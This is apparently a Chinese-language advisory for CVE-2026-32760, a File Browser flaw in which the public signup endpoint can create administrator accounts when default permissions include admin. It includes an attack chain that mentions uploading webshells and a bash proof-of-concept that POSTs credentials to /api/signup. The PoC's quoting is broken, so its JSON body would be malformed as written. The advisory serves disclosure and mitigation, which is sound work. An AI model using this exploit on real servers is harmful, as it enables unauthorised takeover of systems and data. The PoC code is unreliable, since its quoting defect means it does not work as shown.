CVE-2026-32760 CVSS 9.8 严重

CVE-2026-32760 File Browser权限提升漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32760

漏洞类型

权限提升

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

File Browser

漏洞概述

File Browser是一款文件管理工具，其在2.61.2及以下版本中存在严重的权限提升漏洞。由于注册处理逻辑存在缺陷，当管理员开启自注册功能且默认权限设置为管理员时，系统未能正确剥离新用户的敏感权限。因此，未授权攻击者可通过公开注册接口直接创建管理员账户，进而获取对服务器文件、用户及设置的完全控制权。该问题已在2.62.0版本中修复。

技术细节

该漏洞的核心在于File Browser后端处理`signupHandler`函数时的逻辑缺陷。在受影响版本中，当管理员开启自注册功能（`signup = true`）并配置了默认用户权限（`defaults.perm.admin = true`）时，系统未能正确隔离权限继承关系。`signupHandler`在创建新用户时，直接将全局默认配置（包含管理员权限）复制给新用户对象，且缺乏服务端的显式逻辑将`user.Perm.Admin`重置为`false`。这导致本应用于访客的公开注册接口变成了创建特权账户的后门。攻击者利用此漏洞无需任何认证，只需向注册端点发送构造好的POST请求，即可注册一个具有完全控制权的管理员账户。获取管理员权限后，攻击者可利用文件浏览、上传、编辑等功能，进一步执行任意代码写入（如上传Webshell）、窃取敏感数据或破坏系统服务。

攻击链分析

STEP 1

侦察

攻击者发现目标服务器运行了File Browser应用，且确认版本在2.61.2及以下。

STEP 2

漏洞利用

攻击者向目标公开的注册接口（/api/signup）发送POST请求，提交包含用户名和密码的数据。

STEP 3

权限提升

由于服务器未过滤默认权限，返回的Session或JWT令牌包含管理员权限。攻击者成功注册为管理员。

STEP 4

后渗透行动

攻击者使用管理员账户访问后台，上传恶意文件（如Webshell）、查看敏感数据或控制服务器设置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-32760: File Browser Privilege Escalation
# Description: Exploit the signup feature to create a new admin account.

TARGET_URL="http://target-ip:8080"
USERNAME="attacker"
PASSWORD="P@ssw0rd123!"

echo "[+] Attempting to register admin user on $TARGET_URL..."

# Send registration request
curl -X POST "$TARGET_URL/api/signup" \
     -H "Content-Type: application/json" \
     -d "{
       "username": "$USERNAME",
       "password": "$PASSWORD"
     }"

echo ""
echo "[+] If vulnerable, try logging in with $USERNAME / $PASSWORD"

影响范围

File Browser <= 2.61.2

防御指南

临时缓解措施

如果无法立即升级，请务必在配置文件中禁用用户自注册功能（设置 signup 为 false）。同时，严格审查服务器配置，确保默认用户权限中不包含管理员权限。建议通过网络边界防火墙限制对File Browser管理界面的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表